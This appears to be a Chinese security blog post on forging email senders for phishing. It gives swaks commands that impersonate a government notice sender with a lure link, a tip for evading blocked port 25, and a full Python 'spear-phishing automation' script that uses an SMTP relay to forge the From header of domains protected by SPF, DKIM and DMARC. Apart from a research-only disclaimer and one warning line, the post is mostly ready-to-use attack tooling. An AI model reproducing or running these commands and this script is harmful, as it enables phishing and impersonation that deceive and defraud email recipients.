注意,本文提供的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,作者不承担任何法律及连带责任。

有时候,黑客会通过精心编辑的smtp协议包达到钓鱼的目的。因此在邮箱里收到邮件,不能被邮件的发送地址给欺骗,因为有可能的伪造的,如下例子:

1
swaks --to [email protected] --from [email protected] --h-From: '政府通知<[email protected]>' --h-Subject "通知:关于中小企业新政策" --h-X-Mailer gov.cn --h-Message-Id gov.cn  --ehlo gov.cn --body "请点击网址https://www.hack.com查看"

实际用阿里云服务器测试的时候发现阿里云封了出站的25端口,导致无法发送,这个时候因为qq邮箱的mx地址服务器只支持25端口,于是就只能发送别的邮箱如163邮箱可以使用ssl端口。方法是加上–tls-on-connect参数:

1
swaks --to [email protected] --from [email protected] --h-From: '政府通知<[email protected]>' --h-Subject "通知:关于中小企业新政策" --h-X-Mailer gov.cn --h-Message-Id gov.cn  --ehlo gov.cn --body "请点击网址https://www.hack.com查看"  --tls-on-connect

需要注意的是,这个方法只能应用给不存在的邮箱地址,如果是开了 dkim,dmarc,spf 的域名的邮件地址就不能用这个方法,就要用SMTP中继协议来伪造。参考如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
#!/usr/bin/python
"""
@Rvn0xsy - 鱼叉自动化脚本

该脚本需要一个邮件服务器用来Relay,其次需要一个邮件正文eml文件用于发送,邮件服务器需要满足以下条件:

1.支持转发
2.SPF
3.DKIM

格式解释:
'=?UTF-8?B?这里是BASE64编码?='

B = Base64

其中eml文件需要去除Header部分,脚本负责重构。


Example >

$ python .\smtp-relay.py -f <发送邮箱> -t <目标邮箱> -u <邮箱用户名> -p <邮箱密码> -r <伪造对象> --relay_name <伪造对象名称> --subject <邮件标题> -b <邮件正文文件>
~\Desktop> python .\smtp-relay.py -f [email protected] -t [email protected] -u user -p XXX -r [email protected] --relay_name 二维码科技 --subject 测试 -b .\send.eml
2019-07-24 22:39:50,861 - .\smtp-relay.py[line:80] - INFO: 235 Authentication successful
2019-07-24 22:39:53,979 - .\smtp-relay.py[line:52] - INFO: 250 Data Ok
2019-07-24 22:39:53,983 - .\smtp-relay.py[line:87] - INFO: QUIT

PS: DATA内容就是eml文件

============<Header>============
Date: Wed, 24 Jul 2019 15:47:10 +0800 (CST)
From: =?UTF-8?B?xxx?= xxx
To: xxx
Subject: =?UTF-8?B?xxx?=
============</Header>============

============<DATA>============

X-Mailer: Server Version 1.0
Content-Type: multipart/mixed; 
	boundary="----=_Part_65_550351629.1563948317509"
MIME-Version: 1.0
Message-ID: <7a422a.12.16c22957b47.xxx>
Date: Wed, 24 Jul 2019 15:47:10 +0800 (CST)

------=_Part_65_550351629.1563948317509
Content-Type: multipart/alternative; 
	boundary="----=_Part_67_1156720723.1563948317510"

------=_Part_67_1156720723.1563948317510
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: base64

5L2g5Lus5aW95qOS77yB5Yqg5rK577yB

------=_Part_67_1156720723.1563948317510

============</DATA>============
"""
import telnetlib
import time
import logging
import base64
import argparse

logging.basicConfig(format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s',level=logging.INFO)

class SMTPClient():
    def __init__(self,):
        self.mail_from = ''
        self.mail_to = []
        self.send_data = ''
        self.mail_header = ''
        self.tn = telnetlib.Telnet()
    def set_mail_header(self,mail_subject,mail_relay,mail_relay_name):
        now_date = time.strftime("%a, %d %b %Y %H:%M:%S +0800 (CST)", time.localtime())
        self.mail_header = "Date: {}\r\nFrom: =?UTF-8?B?{}?= <{}>\r\nTo: {}\r\nSubject: =?UTF-8?B?{}?=\r\n".format(now_date,
            base64.b64encode(mail_relay_name.encode()).decode(),
            mail_relay,
            self.mail_to[0],base64.b64encode(mail_subject.encode()).decode())
        
    def set_mail(self,mail_from,mail_to,send_body):
        self.mail_from = mail_from
        self.mail_to = mail_to
        with open(send_body, "rb") as f_body:
            self.send_data = f_body.read()
        f_body.close()
    def send_ehlo(self, content):
        self.tn.write(content.encode())

    def send_mail(self):
        mail_from = "MAIL FROM:<%s>" % self.mail_from
        logging.info(mail_from)
        # 250 Mail Ok
        self.tn.write(mail_from.encode() + b'\r\n')
        self.tn.read_until(b"250 Mail Ok\r\n",timeout=3)
        logging.info("250 Mail Ok")
        
        for mail in self.mail_to:
            mail_rpct = "RCPT TO:<%s>" % mail
            self.tn.write(mail_rpct.encode() + b'\r\n')
            self.tn.read_until(b"250 Rcpt Ok\r\n",timeout=3)
            logging.info(mail_rpct)
        # 250 Rcpt Ok
        self.tn.write(b'DATA\n')
        self.tn.read_until(b"354 End data with <CR><LF>.<CR><LF>\r\n",timeout=3)
        # 354 End data with <CR><LF>.<CR><LF>
        send_all = self.mail_header.encode()+self.send_data+b"\r\n.\r\n"
        # self.tn.write(self.mail_header.encode()+b"\r\n")
        # self.tn.write(self.send_data+b"\r\n.\r\n")
        self.tn.write(send_all)
        # 250 Data Ok: queued as freedom
        self.tn.read_until(b"250 Data Ok: queued as freedom\r\n",timeout=3)
        logging.info("250 Data Ok")
    def login_host(self,host_ip,username,password):
        try:
            self.tn.open(host_ip,port=25)
        except:
            logging.warning('%s Connect Error..'%host_ip)
            return False
        self.send_ehlo("EHLO virtual-machine\r\n")
        # 250-smtp.aliyun-inc.com
        # 250-STARTTLS
        # 250-8BITMIME
        # 250-AUTH=PLAIN LOGIN XALIOAUTH
        # 250-AUTH PLAIN LOGIN XALIOAUTH
        # 250-PIPELINING
        # 250 DSN
        self.tn.read_until(b"250-smtp.aliyun-inc.com\r\n",timeout=3)
        self.tn.read_until(b"250-STARTTLS\r\n",timeout=3)
        self.tn.read_until(b"250-8BITMIME\r\n",timeout=3)
        self.tn.read_until(b"250-AUTH=PLAIN LOGIN XALIOAUTH\r\n",timeout=3)
        self.tn.read_until(b"250-AUTH PLAIN LOGIN XALIOAUTH\r\n",timeout=3)
        self.tn.read_until(b"250-PIPELINING\r\n",timeout=3)
        self.tn.read_until(b"250 DSN\r\n",timeout=3)
        self.tn.write(b"AUTH LOGIN\r\n")
        self.tn.read_until(b"334 dXNlcm5hbWU6\r\n",timeout=3)
        self.tn.write(base64.b64encode(username.encode()) + b'\r\n')
        self.tn.read_until(b"334 UGFzc3dvcmQ6\r\n",timeout=3)
        self.tn.write(base64.b64encode(password.encode()) + b'\r\n')
        self.tn.read_until(b"235 Authentication successful\r\n",timeout=3)
        logging.info("235 Authentication successful")
        return True

    def logout_host(self):
        self.tn.write(b"QUIT\r\n")
        self.tn.read_until(b"221 Bye\r\n",timeout=3)
        self.tn.close()
        logging.info("QUIT")

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.description = "AMAIL SMTP Relay Client - Version 1.0"
    parser.add_argument("-f","--mail_from",type=str,help="Mail From",required = True)
    parser.add_argument("-t","--mail_to",type=str,help="Mail To",required = True)
    parser.add_argument("-u","--username",type=str,help="SMTP Username",required = True)
    parser.add_argument("-p","--password",type=str,help="SMTP Password",required = True)
    parser.add_argument("-s","--server",type=str,help="SMTP Server", default="smtp.mxhichina.com")
    parser.add_argument("-b","--body",type=str,help="Mail Body", required = True)
    parser.add_argument("-r","--relay",type=str,help="Mail Relay To", required = True)
    parser.add_argument("--relay_name",type=str,help="Mail Relay To Name", required = True)
    parser.add_argument("--subject",type=str,help="Mail Subject", required = True)
    args = parser.parse_args()
    
    smtp_client = SMTPClient()

    if smtp_client.login_host(args.server,args.username,args.password):
        smtp_client.set_mail(args.mail_from,args.mail_to.split(","),args.body)
        smtp_client.set_mail_header(args.subject,args.relay,args.relay_name)
        smtp_client.send_mail()
        smtp_client.logout_host()

参考:https://payloads.online/archivers/2020-02-05/1/

说些什么吧!

utterances